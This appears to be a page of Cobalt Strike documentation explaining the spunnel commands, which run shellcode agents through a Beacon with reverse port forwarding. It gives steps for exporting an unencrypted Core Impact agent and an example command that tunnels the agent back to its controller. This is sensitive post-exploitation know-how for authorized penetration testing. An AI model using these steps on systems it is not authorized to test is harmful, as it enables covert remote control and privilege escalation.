Spawn and Tunnel

Use the spunnel command to spawn a third-party tool in a temporary process and create a reverse port forward for it. The syntax is spunnel [x86 or x64] [controller host] [controller port] [/path/to/agent.bin]. This command expects that the agent file is position-independent shellcode (usually the raw output from another offense platform). The spunnel_local command is the same as spunnel, except it initiates the controller connection from your Cobalt Strike client. The spunnel_local traffic is communicated through the connection your Cobalt Strike client has to its team server.

Agent Deployed: Interoperability with Core Impact

The spunnel commands were designed specifically to tunnel Core Impact's agent through Cobalt Strike's Beacon. Core Impact is a penetration testing tool and exploit framework also available for license from Fortra at https://www.coresecurity.com/products/core-impact

To export a raw agent file from Core Impact:

  1. Click the Modules tab in the Core Impact user interface

  2. Search for Package and Register Agent

  3. Double-click this module

  4. Change Platform to Windows

  5. Change Architecture to x86-64

  6. Change Binary Type to raw

  7. Click Target File and press ... to decide where to save the output.

  8. Go to Advanced

  9. Change Encrypt Code to false

  10. Go to Agent Connection

  11. Change Connection Method to Connect from Target

  12. Change Connect Back Hostname to 127.0.0.1

  13. Change Port to some value (e.g., 9000) and remember it.

  14. Press OK.

The above will generate a Core Impact agent as a raw file. You may use spunnel x64 or spunnel_local x64 to run this agent and tunnel it back to Core Impact.

We often use Cobalt Strike on internet-reachable infrastructure, while Core Impact is often on a local Windows virtual machine. This is the reason we have spunnel_local. We recommend that you run a Cobalt Strike client from the same Windows system that Core Impact is installed on.

In this setup, you can run spunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin. Once the connection is made, you will hear the famous "Agent Deployed" wav file.

With an Impact agent on target, you have tools to escalate privileges, scan and gather information via many modules, launch remote exploits, and chain other Impact agents through your Beacon connection.
